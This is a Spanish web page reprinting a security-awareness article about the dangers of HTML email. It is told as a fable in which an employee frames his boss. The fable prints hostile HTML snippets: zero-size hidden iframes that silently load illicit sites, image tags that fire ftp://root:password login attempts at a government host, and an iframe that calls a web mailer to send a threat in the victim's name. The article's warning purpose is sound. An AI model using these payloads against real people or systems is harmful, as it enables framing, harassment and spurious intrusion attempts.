Principal | Buscar | Contacto | Mapa |  
Menú
 Principal
 Agregar Favoritos
 Buscar en el Sitio
 Categorías
 Condiciones Uso
 Enlace Roto
 Estadísticas
 Google Groups
 Newsletter
 Noticias
 Novedades
 Página de Inicio
 Publicitar
  Recomiéndanos
 Software en tu Web
 Submit Software
 
Software Gratis
- Educativos
- Escritorio
- Gestores
- Internet
- Juegos
- Multimedia
- Programación
- Utilidades
 
Navegación
- Afiliados               - ZonaTecnológica    - Enciclopedia          - Diccionario            - ZonaVideos            - Trailers                  - Radios On-Line       - ZonaTV Online      - ZonaMujer            - Amigos y Pareja
- Biografías de Cine
- Bingo onLine
- Casino onLine
- Comprar y Vender
- Curiosidades
- Diccionarios Gratis
- Diseño y Gifs
- Drivers Gratuitos
- Esoterismo
- Fondos p/Móviles
- Free Ringtones
- Ganar Dinero
- Google Maníacos
- Guía de Casinos
- Hoteles
- Índice Web
- Manuales Gratis
- Paypal España
- Poker onLine
- Recetas
- Salvapantallas
- Seguridad
- Servicios
- Templates Gratis
- Tienda online
- Universo Seti
- Venta de Dominios
- Venta de Libros
- Wallpapers Gratis
- Webmasters         - Mapa del Sitio
 
Fondos Gratis

Fondos de Escritorio Animados Gratis!!

Wallpapers Animados Gratis !!
 

 

 
 Seguridad en Internet
 
 

Los peligros del html en el correo electrónico

Como colaboración a la Campaña Nacional de Seguridad en Internet revisado un viejo artículo publicado ya en otros foros con el fin de hacer reflexionar a los lectores de estas páginas sobre algunos peligros del correo electrónico con formato HTML.

No se trata de explotar vulnerabilidades de seguridad sino tan solo de utilizar las funcionalidades estándar del correo electrónico que nos ofrecen casi todos los fabricantes de Software, es decir que todos los programas de correo que aceptan presentación HTML son susceptibles de sufrir este tipo de ataques que a mi juicio son muchísimo más graves que cualquier virus o troyano conocidos o por conocer.

El problema radica en que una dirección IP es utilizada como principal prueba incriminatoria siempre que se comete un delito en la red. Normalmente esta incriminación es razonable pero sin embargo existen las posibilidades mencionadas en la fábula que se acompaña según las cuales, en Internet,  la dirección IP de cualquiera de nosotros puede ser aparentemente responsable de los delitos más execrables.

¿Las causas? Un incorrecto y obsoleto diseño de la tecnología utilizada en Internet. Las que llamamos "nuevas tecnologías" (basadas en protocolos TCP/IP) fueron inventadadas hace ya 30 años y desde el punto de vista de la seguridad fueron diseñadas para ser usadas tan solo entre caballeros.

------------------------------------------------------------
ATAQUES CONTRA EL HONOR
------------------------------------------------------------

PREFACIO

Los hechos que voy a relatar son  en principio  ficticios, pero puede que ya hayan ocurrido, o que ocurran dentro de muy poco tiempo. Incluso puede que tú, inocente Internauta, estés siendo ya víctima mientras estás leyendo estas líneas de las maldades que voy a relatar a continuación.

Tal y como últimamente se suele hacer cuando alguien publica maldades, incluyo la tradicional CLAÚSULA DE NO RESPONSABILIDAD:  "No me considero responsable del uso que se haga de esta fábula que, como todas las fábulas, se publica tan sólo con fines educativos".

Además de lo dicho, confío y espero que ningún lector haga uso de los métodos que voy a describir a continuación. Y, por supuesto, nadie puede esperar ni demandar de mí ningún tipo de asesoramiento, ayuda o información adicional, que tenga por objeto materializar lo aquí expuesto.

EDISODIO PRIMERO

Mi nombre es Nero, Pancracio Nero. Trabajo para la reconocida compañía multinacional RCICSTS (Real Compañía Internacional de Cecinas y Salazones de Tañabueyes de la Sierra).

La RCICSTS, como empresa moderna y eficaz, hace ya años que permitió el acceso a Internet de sus empleados. Sin embargo, los gurús del cuartel general de la empresa decidieron instalar un sofisticado software denominado "Sistema de Control de Uso de Internet por Empleados" (SCUIE).

Hace unas semanas, fui víctima de dicho sistema. Mi jefe, Don Inocencio, recibió un correo electrónico, generado tomáticamente por el SCUIE, en el que se indicaba que yo estaba haciendo un uso abusivo de
la red, puesto que, durante el último mes, había estado accediendo a un promedio de 5.678 páginas diarias.

D. Inocencio me citó en su despacho para echarme una gran bronca. Yo traté de buscarme una buena coartada, en base a que últimamente estaba investigando un nuevo método sobre la curación de jamones de avestruz con sabor a jamón de jabugo, lo cual me obligaba a arduos esfuerzos de navegación para controlar a la posible competencia en el negocio. Mi coartada no resultó muy convicente , puesto que el sistema SCUIE había generado un informe en el que se demostraba que mis, en promedio diario, 5.678 páginas visitadas no tenían ninguna relación con el negocio de la RCICSTS. Dado que el departamento de personal de la empresa estaba también al corriente del asunto, y exigía un castigo ejemplar, Don Inocencio decidió cancelar mi acceso a Internet.

Don Inocencio nunca me había caído muy bien, y el castigo a que me había sometido creó en mí un sentimiento de odio que inexorablemente me impulsaba a la venganza.

En la empresa, era un hecho conocido que el sistema SCUIE incluía también un mecanismo de chivatos para las visitas a sitios Internet "indecentes", así que decidí utilizar esta circunstancia para vengarme de Don Inocencio.

Durante una noche insomne (debida al odio que albergaba contra mi jefe) me senté frente a mi ordenador casero y comencé a preparar un malévolo mensaje de correo para Don Inocencio. El objetivo de dicho mensaje era hundirle en el descrédito.

Primero, necesitaba componer un mensaje que fuera leído por mi víctima. En los tiempos que corren, con tanto correo no solicitado circulando por el ciberespacio, se necesita ser cuidadoso para asegurarse de que alguien lea un correo. Mi formación en Ingeniería Social me hizo encontrar rápidamente una solución al problema. Como mi jefe era persona muy versada en temas de golf, puse a mi mensaje un encabezamiento infalible: "Nuevo utillaje disponible tan sólo para los buenos jugadores de golf". Como remitente, puse también una dirección convincente: info@golf-champions.com  En el cuerpo del mensaje puse cuatro imbecilidades sobre un nuevo modelo de calzoncillos inerciales, que facilita el movimiento de caderas que precede al golpeo de la bola. 

Pero lo más importante es que, dentro del código HTML de dichas imbecilidades, puse cosas como:

<iframe src='http://www.sexofuerte.com' width=0 height=0> </iframe>
<iframe src='http://www.solopedofilos.com' width=0 height=0>
</iframe>
<iframe src='http://www.degenerados.com' width=0 height=0> </iframe>
Etc,etc,etc...

Por último, y para no dejar pistas, envié el mensaje usando una página bielorrusa que permite el envío de correo. No contento con eso, utilicé además un par de sitios de reenvío (remailers), que hacen prácticamente imposible la deducción del origen del mismo.

Poco después de pulsar el botón de envío de correo, conseguí volver a conciliar el sueño.


EPISODIO SEGUNDO

¿Cuáles fueron los efectos de mi acción?

Al día siguiente, ya en la oficina, pude comprobar con deleite como mi jefe era llamado al despacho del Jefe de Personal (Director de Recursos Humanos, según la terminología al uso). La encerrona duró casi una hora y cuando Don Inocencio regresó a su despacho, su cara confirmó la eficacia de mi siniestro plan. El sistema de control SCUIE había detectado que un empleado llamado Inocencio se dedicaba a visitar sitios "inapropiados" de Internet durante las horas de trabajo.

Durante un par de días mi jefe anduvo cabizbajo, con cara de colegial de los Padres Jesuitas sorprendido in-fraganti por el Padre Prefecto fumando en el WC.

Comprendí entonces que mi plan había funcionado. Sin embargo, deduje que Don Incocencio había conseguido parar de alguna forma el golpe, y que no se habían tomado medidas disciplinarias contra él. Mi malévolo cerebro se puso inmediatamente a maquinar la segunda fase mi plan.

Nuevamente recurrí al correo electrónico, empleando las mismas técnicas utilizadas en mi ataque anterior. Sin embargo, en este caso el mensaje de correo contenía unas líneas de código HTML como:

<image src='ftp://root:aaaaaa@www.the-moncloa.gov' width=0 height=0>
<image src='ftp://root:aaaaab@www.the-moncloa.gov' ' width=0 height=0>
Etc,etc,etc...

Según mis cálculos, unos cuantos cientos de líneas de este estilo harían saltar las alarmas de cualquier sitio decentemente protegido, ya que mi ataque (o, mejor dicho, el de D. Inocencio), parecería un intento de acceso por fuerza bruta.

El efecto de esta nueva acción fue menos inmediato, pero mucho más duro que el del golpe anterior.

Al cabo de tres días, el Jefe de Personal se presentó en el despacho de mi Jefe acompañado de dos desconocidos, que a mí me parecieron miembros de algún Cuerpo (o quizá Fuerza) de Seguridad del Estado.Pocos minutos después, Don Inocencio salió de la oficina, seguido de cerca por los dos desconocidos.

Cuando, pasados tres días, volvió a aparecer por la oficina, su persona presentaba el aspecto de un hombre que hubiera sufrido grandes desdichas espirituales. Por la oficina corría el rumor de que Don Inocencio había sido procesado bajo acusación de intento de acceso ilegal a los sistemas de Información de la Presidencia del  Gobierno de España.


EPISODIO TERCERO

El rumor resultó ser cierto. Sin embargo, Don Inocencio (que era yerno del difunto Don Guillermo Cisternas, anterior dueño de la RCICSTS, Real Compañía Internacional de Cecinas y Salazones de Tañabueyes de la Sierra), y para no dar motivos de escándalo público, no fue despedido de su puesto, en contra de la opinión del Jefe de Personal. Don Inocencio contrató al mejor abogado de las causas perdidas (llamado Don Carlos Mediala) y, a pesar de las evidencias en su contra, salió bien parado del asunto.

No hará falta decir aquí que mi deseo de venganza se acrecentó ante el fracaso de mi segundo intento. Fue entonces cuando me decidí a utilizar la solución final.

Yo creía haber demostrado que mi Jefe era un degenerado sexual, y un traidor a la patria que robaba información de nuestra Presidencia del Gobierno, pero todo ello parecía no haber resultado suficiente para acabar con la poca reputación que le quedaba a Don Inocencio. Por otro lado, gracias al diablo y a la poca perspicacia de los investigadores, mis dos ataques anteriores no habían sido descubiertos, así que decidí seguir utilizando el correo electrónico como mi personal arma letal para cargarme a mi odiado Jefe.

Mi nuevo intento debía ser más expeditivo así que decidí enviar un correo con el siguiente código HTML:

   <iframe src='http://www.haysitios.com/cgi-bin/enviar
   origen=Inocencio@RCICSTS.com
   mailto:destino=su-majestad@the-zarzuela.es
   Asunto=Voy a acabar contigo
   Mensaje= --Aquí amenazas de grueso calibre--
   width=0 height=0> </iframe>

Justo cuando Don Inocencio realizaba la habitual lectura matutina de su correo electrónico, se recibió en la Jefatura del Estado un mensaje amenazante y lleno de injurias. El castigo por dicho delito era de seis años de prisión.

Ya no odio a Don Inocencio. Mi venganza se ha realizado. Todos los primeros sábados de cada mes viajo a Santoña, y en la prisión de El Dueso, visito a mi ex-jefe, le aporto consuelo en su desgracia y le regalo un par de kilos de morcillas de Burgos, que sirven para aliviar sus penas.

Por cierto: mi pequeña falta quedó olvidada, y estoy escribiendo todo esto en horas de trabajo, y mientras ocupo el despacho de Don Inocencio en la Real Compañía Internacional de Cecinas y Salazones de Tañabueyes de la Sierra. Incluso me hecho novio de la hija de D. Inocencio y si las cosas discurren según mis cálculos espero ser el dueño de la empresa al día siguiente de mi boda, programada para celebrar la próxima concesión del tercer grado penitenciario a mi futuro suegro D. Inocencio.

Fuente

Al Pasar >>

Hoteles

Casino online

Bingo onLine

Poker

Juegos Casino

 

LO ÚLTIMO en tu Correo. Suscríbete Gratis a NUESTRO BOLETÍN !!

Te Agradeceríamos nos informes si encuentras un ENLACE ROTO
                                                                                                                              
 

 

 

 
 | Home | Buscar | Mapa Sitio | Categorías | Contacto |
Copyright © 2002 - 2008 - Zona Gratuita .COM - Permitido el uso Parcial citando Fuentes y Autores
 | Zona Gratuita | Casino onLine | ShaFree | Utilidades Gratis |